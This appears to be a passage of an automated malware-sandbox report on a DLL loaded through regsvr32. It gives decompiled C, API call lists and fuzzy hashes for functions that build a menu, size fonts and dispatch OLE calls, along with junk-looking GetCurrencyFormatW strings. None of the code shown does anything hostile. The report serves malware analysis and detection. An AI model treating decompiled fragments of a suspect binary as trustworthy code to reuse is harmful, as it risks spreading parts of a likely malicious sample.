                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100015B5
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100015DF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001606
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001639
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001668
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 5189b181ffaafe6b9c05ca24a10a3e20f9d538d3ca2e5d5b4c785eae2a339ca0
                                                                                                            • Instruction ID: 4961d4481171c5eb7b22e17488040c19a8d80f5034832b3bd1fa6cad81c8b5c3
                                                                                                            • Opcode Fuzzy Hash: 5189b181ffaafe6b9c05ca24a10a3e20f9d538d3ca2e5d5b4c785eae2a339ca0
                                                                                                            • Instruction Fuzzy Hash: 52319D73644215BFE204CB55CD82F86FBA9EB9A751F06401AF704BF5D1CB30A8548EA8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10004C30 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E10004C30(void* __edx, void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t38;
				void* _t43;
				void* _t51;
				void* _t52;
				void* _t53;
				long* _t54;
				void* _t58;
				CHAR* _t63;
				signed int _t64;
				void* _t66;

				_t66 = __eflags;
				_t51 = __edx;
				_push(0xffffffff);
				_push(E10032E77);
				_push( *[fs:0x0]);
				_push(_t43);
				_push(_t38);
				_push(_t52);
				_t19 =  *0x10045580; // 0x8f64cb61
				_push(_t19 ^ _t64);
				 *[fs:0x0] = _t64 + 0x18;
				_t58 = _t43;
				E10007D6C(_t38, _t43, _t52);
				_push(GetSystemMenu( *(_t58 + 0x20), 0));
				_t53 = E1000ED5E(0, _t43, _t52, _t58, _t66);
				if(_t53 != 0) {
					E1000424F(_t64 + 0x18, E1001044F());
					 *((intOrPtr*)(_t64 + 0x24)) = 0;
					E10004C10(_t64 + 0x18, 0x65);
					_t63 =  *(_t64 + 0x14);
					if( *((intOrPtr*)(_t63 - 0xc)) != 0) {
						AppendMenuA( *(_t53 + 4), 0x800, 0, 0);
						AppendMenuA( *(_t53 + 4), 0, 0x10, _t63);
					}
					 *(_t64 + 0x20) =  *(_t64 + 0x20) | 0xffffffff;
					E10001260(_t63 - 0x10, _t51);
				}
				_t54 = _t58 + 0x11c;
				SendMessageA( *(_t58 + 0x20), 0x80, 1,  *_t54);
				SendMessageA( *(_t58 + 0x20), 0x80, 0,  *_t54);
				E1000EE6D(_t58, 0x3e9, "Hola Mundo");
				E1000EE6D(_t58, 0x3ea, "Hola Mundo");
				SendMessageA( *(_t58 + 0xe8), 0x143, 0, "Hola");
				 *[fs:0x0] =  *((intOrPtr*)(_t64 + 0x18));
				return 1;
			}



















                                                                                                            0x10004c30
                                                                                                            0x10004c30
                                                                                                            0x10004c30
                                                                                                            0x10004c32
                                                                                                            0x10004c3d
                                                                                                            0x10004c3e
                                                                                                            0x10004c3f
                                                                                                            0x10004c42
                                                                                                            0x10004c43
                                                                                                            0x10004c4a
                                                                                                            0x10004c4f
                                                                                                            0x10004c55
                                                                                                            0x10004c57
                                                                                                            0x10004c68
                                                                                                            0x10004c6e
                                                                                                            0x10004c72
                                                                                                            0x10004c7e
                                                                                                            0x10004c89
                                                                                                            0x10004c8d
                                                                                                            0x10004c92
                                                                                                            0x10004c99
                                                                                                            0x10004cab
                                                                                                            0x10004cb5
                                                                                                            0x10004cb5
                                                                                                            0x10004cb7
                                                                                                            0x10004cbf
                                                                                                            0x10004cbf
                                                                                                            0x10004cca
                                                                                                            0x10004cdd
                                                                                                            0x10004ce7
                                                                                                            0x10004cf6
                                                                                                            0x10004d03
                                                                                                            0x10004d1a
                                                                                                            0x10004d23
                                                                                                            0x10004d32

                                                                                                            APIs
                                                                                                            • GetSystemMenu.USER32(?,00000000,8F64CB61,?,?,?,?,?,?,10032E77,000000FF), ref: 10004C62
                                                                                                            • AppendMenuA.USER32 ref: 10004CAB
                                                                                                            • AppendMenuA.USER32 ref: 10004CB5
                                                                                                            • SendMessageA.USER32(?,00000080,00000001,?), ref: 10004CDD
                                                                                                            • SendMessageA.USER32(?,00000080,00000000,?), ref: 10004CE7
                                                                                                            • SendMessageA.USER32(?,00000143,00000000,Hola), ref: 10004D1A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MenuMessageSend$Append$System
                                                                                                            • String ID: Hola$Hola Mundo
                                                                                                            • API String ID: 1041970973-3638179569
                                                                                                            • Opcode ID: e34ef31d9de0c10b9e087c5bcc9f0d31551c493d279669179a5a011054600792
                                                                                                            • Instruction ID: b3705290631e1be327c95a3509f9ae24e9e58cb89a542e4eda3f4c22a02a2666
                                                                                                            • Opcode Fuzzy Hash: e34ef31d9de0c10b9e087c5bcc9f0d31551c493d279669179a5a011054600792
                                                                                                            • Instruction Fuzzy Hash: 4521E571600744BFE711DB20CC82F6BB7A9FB49B90F004A29F255A61E1DB36BD04CB65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10012309 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10012309(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10045580; // 0x8f64cb61
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E1001FBB5(E100121BA(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

















                                                                                                            0x1001230f
                                                                                                            0x10012316
                                                                                                            0x1001231b
                                                                                                            0x10012324
                                                                                                            0x10012327
                                                                                                            0x1001232a
                                                                                                            0x1001232f
                                                                                                            0x10012333
                                                                                                            0x1001233d
                                                                                                            0x1001234c
                                                                                                            0x10012350
                                                                                                            0x1001235d
                                                                                                            0x1001235f
                                                                                                            0x10012361
                                                                                                            0x10012361
                                                                                                            0x1001237c
                                                                                                            0x1001237f
                                                                                                            0x1001237f
                                                                                                            0x10012385
                                                                                                            0x10012385
                                                                                                            0x1001238b
                                                                                                            0x1001238d
                                                                                                            0x1001238d
                                                                                                            0x100123a8
                                                                                                            0x100123a8
                                                                                                            0x10012337
                                                                                                            0x1001233b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetStockObject.GDI32(00000011), ref: 1001232F
                                                                                                            • GetStockObject.GDI32(0000000D), ref: 10012337
                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 10012344
                                                                                                            • GetDC.USER32(00000000), ref: 10012353
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10012367
                                                                                                            • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10012373
                                                                                                            • ReleaseDC.USER32 ref: 1001237F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                            • String ID: System
                                                                                                            • API String ID: 46613423-3470857405
                                                                                                            • Opcode ID: f7306e7935f5abbcbdc9fefcc9670ce0ed1cf25eefe840699117e3069a8def3f
                                                                                                            • Instruction ID: 49ddb338abe5c97598327bd9655a3bb67b407c313b2becf61478e8986669c503
                                                                                                            • Opcode Fuzzy Hash: f7306e7935f5abbcbdc9fefcc9670ce0ed1cf25eefe840699117e3069a8def3f
                                                                                                            • Instruction Fuzzy Hash: 9B1182B1600328AFEB14DBA0CC89FAE77B8EB49781F014015F601EE1D1DB749E418B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001D204 Relevance: 13.8, APIs: 9, Instructions: 253stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E1001D204(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E1001FC63(E100348FF, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E1000EC55(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_push( *(_t191 + 8) << 4);
					_t127 = E100010EE(_t173, _t185, _t187, _t191, __eflags);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E100203C0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E10020F40(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E1001C9FD(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_push(_t49);
						_t135 = E100010EE(_t173, _t185, _t187, _t49, __eflags);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E1001FCBF(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E1000E519();
							goto L7;
						}
						E100203C0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x10038ec0;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E1001CF1C(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E1001CDAE(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E1001CE04(_t195 - 0x58);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E1000E519();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M1001D514))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E1001CE04(_t179);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E1000E519();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E1001E78B();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E1001E78B();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E1001E78B();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E1001E78B();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				_push(_t19);
				if(E100010EE(_t173, _t185, _t19, _t190, _t201) != 0) {
					E100203C0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E10005007(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}





























                                                                                                            0x1001d204
                                                                                                            0x1001d204
                                                                                                            0x1001d204
                                                                                                            0x1001d20b
                                                                                                            0x1001d210
                                                                                                            0x1001d219
                                                                                                            0x1001d21e
                                                                                                            0x1001d221
                                                                                                            0x1001d224
                                                                                                            0x1001d228
                                                                                                            0x1001d22b
                                                                                                            0x1001d22f
                                                                                                            0x1001d232
                                                                                                            0x1001d237
                                                                                                            0x1001d237
                                                                                                            0x1001d23d
                                                                                                            0x1001d243
                                                                                                            0x1001d247
                                                                                                            0x1001d24c
                                                                                                            0x1001d253
                                                                                                            0x1001d256
                                                                                                            0x1001d2ca
                                                                                                            0x1001d2ca
                                                                                                            0x1001d2d3
                                                                                                            0x1001d2d4
                                                                                                            0x1001d2d9
                                                                                                            0x1001d2db
                                                                                                            0x1001d2dc
                                                                                                            0x1001d2ed
                                                                                                            0x1001d2f0
                                                                                                            0x1001d2f6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d2f8
                                                                                                            0x1001d2fd
                                                                                                            0x1001d302
                                                                                                            0x1001d305
                                                                                                            0x1001d30d
                                                                                                            0x1001d312
                                                                                                            0x1001d320
                                                                                                            0x1001d322
                                                                                                            0x1001d322
                                                                                                            0x1001d325
                                                                                                            0x1001d326
                                                                                                            0x1001d32b
                                                                                                            0x1001d32e
                                                                                                            0x1001d266
                                                                                                            0x1001d266
                                                                                                            0x1001d26e
                                                                                                            0x1001d27a
                                                                                                            0x1001d507
                                                                                                            0x1001d50f
                                                                                                            0x1001d50f
                                                                                                            0x1001d270
                                                                                                            0x1001d273
                                                                                                            0x1001d275
                                                                                                            0x1001d275
                                                                                                            0x00000000
                                                                                                            0x1001d275
                                                                                                            0x1001d336
                                                                                                            0x1001d33b
                                                                                                            0x1001d33e
                                                                                                            0x1001d340
                                                                                                            0x1001d342
                                                                                                            0x1001d349
                                                                                                            0x1001d34c
                                                                                                            0x1001d34f
                                                                                                            0x1001d352
                                                                                                            0x1001d35b
                                                                                                            0x1001d35c
                                                                                                            0x1001d362
                                                                                                            0x1001d365
                                                                                                            0x1001d369
                                                                                                            0x1001d36c
                                                                                                            0x1001d36f
                                                                                                            0x1001d370
                                                                                                            0x1001d373
                                                                                                            0x1001d374
                                                                                                            0x1001d379
                                                                                                            0x1001d37b
                                                                                                            0x1001d37e
                                                                                                            0x1001d3d9
                                                                                                            0x1001d3d9
                                                                                                            0x1001d3dc
                                                                                                            0x1001d3de
                                                                                                            0x1001d3e1
                                                                                                            0x1001d3fc
                                                                                                            0x1001d3fc
                                                                                                            0x1001d400
                                                                                                            0x1001d403
                                                                                                            0x1001d450
                                                                                                            0x1001d455
                                                                                                            0x1001d458
                                                                                                            0x1001d45a
                                                                                                            0x1001d4b6
                                                                                                            0x1001d4b6
                                                                                                            0x1001d4b9
                                                                                                            0x1001d4df
                                                                                                            0x1001d4e5
                                                                                                            0x1001d4e8
                                                                                                            0x1001d4ec
                                                                                                            0x1001d4f1
                                                                                                            0x1001d4f5
                                                                                                            0x1001d4f9
                                                                                                            0x1001d4fb
                                                                                                            0x1001d4fe
                                                                                                            0x1001d500
                                                                                                            0x1001d500
                                                                                                            0x1001d505
                                                                                                            0x00000000
                                                                                                            0x1001d505
                                                                                                            0x1001d4bb
                                                                                                            0x1001d4bb
                                                                                                            0x1001d4bc
                                                                                                            0x1001d4c6
                                                                                                            0x1001d4c6
                                                                                                            0x1001d4c8
                                                                                                            0x1001d4cd
                                                                                                            0x1001d4cd
                                                                                                            0x00000000
                                                                                                            0x1001d4c8
                                                                                                            0x1001d4be
                                                                                                            0x1001d4be
                                                                                                            0x1001d4c1
                                                                                                            0x1001d4d6
                                                                                                            0x00000000
                                                                                                            0x1001d4d6
                                                                                                            0x1001d4c3
                                                                                                            0x1001d4c4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d4c4
                                                                                                            0x1001d45c
                                                                                                            0x1001d45f
                                                                                                            0x1001d465
                                                                                                            0x1001d468
                                                                                                            0x1001d46b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d46d
                                                                                                            0x00000000
                                                                                                            0x1001d49c
                                                                                                            0x1001d49c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d4ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d48a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d492
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d479
                                                                                                            0x1001d47c
                                                                                                            0x1001d47f
                                                                                                            0x1001d482
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d497
                                                                                                            0x1001d49a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d4a2
                                                                                                            0x1001d4a5
                                                                                                            0x1001d4a7
                                                                                                            0x1001d4a8
                                                                                                            0x1001d4a9
                                                                                                            0x1001d4aa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d474
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d46d
                                                                                                            0x1001d405
                                                                                                            0x1001d409
                                                                                                            0x1001d40e
                                                                                                            0x1001d412
                                                                                                            0x1001d416
                                                                                                            0x1001d418
                                                                                                            0x1001d41b
                                                                                                            0x1001d41d
                                                                                                            0x1001d41d
                                                                                                            0x00000000
                                                                                                            0x1001d422
                                                                                                            0x1001d3e9
                                                                                                            0x1001d3ec
                                                                                                            0x1001d3f2
                                                                                                            0x1001d3f6
                                                                                                            0x1001d3f7
                                                                                                            0x1001d3f7
                                                                                                            0x00000000
                                                                                                            0x1001d3e9
                                                                                                            0x1001d380
                                                                                                            0x1001d384
                                                                                                            0x1001d387
                                                                                                            0x1001d388
                                                                                                            0x1001d389
                                                                                                            0x1001d38c
                                                                                                            0x1001d390
                                                                                                            0x1001d3c4
                                                                                                            0x1001d3c9
                                                                                                            0x1001d3cf
                                                                                                            0x1001d3d2
                                                                                                            0x1001d3d2
                                                                                                            0x00000000
                                                                                                            0x1001d3d2
                                                                                                            0x1001d392
                                                                                                            0x1001d395
                                                                                                            0x1001d3ba
                                                                                                            0x1001d3ba
                                                                                                            0x1001d3bf
                                                                                                            0x00000000
                                                                                                            0x1001d3bf
                                                                                                            0x1001d397
                                                                                                            0x1001d39a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d39f
                                                                                                            0x1001d3a2
                                                                                                            0x1001d3b6
                                                                                                            0x1001d3a4
                                                                                                            0x1001d3a9
                                                                                                            0x1001d3ac
                                                                                                            0x1001d3ac
                                                                                                            0x00000000
                                                                                                            0x1001d3a2
                                                                                                            0x1001d2de
                                                                                                            0x1001d2de
                                                                                                            0x1001d2e2
                                                                                                            0x1001d2e5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d2e7
                                                                                                            0x1001d2ea
                                                                                                            0x00000000
                                                                                                            0x1001d2ea
                                                                                                            0x1001d258
                                                                                                            0x1001d258
                                                                                                            0x1001d25b
                                                                                                            0x1001d264
                                                                                                            0x1001d286
                                                                                                            0x1001d28b
                                                                                                            0x1001d28e
                                                                                                            0x1001d294
                                                                                                            0x1001d299
                                                                                                            0x1001d29e
                                                                                                            0x1001d2a2
                                                                                                            0x1001d2a5
                                                                                                            0x1001d2a9
                                                                                                            0x1001d2ac
                                                                                                            0x1001d2b0
                                                                                                            0x1001d2b0
                                                                                                            0x1001d2b1
                                                                                                            0x1001d2b5
                                                                                                            0x1001d2b9
                                                                                                            0x1001d2ba
                                                                                                            0x1001d2bd
                                                                                                            0x1001d2c5
                                                                                                            0x1001d2c8
                                                                                                            0x1001d2c8
                                                                                                            0x00000000
                                                                                                            0x1001d2c8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 1001D20B
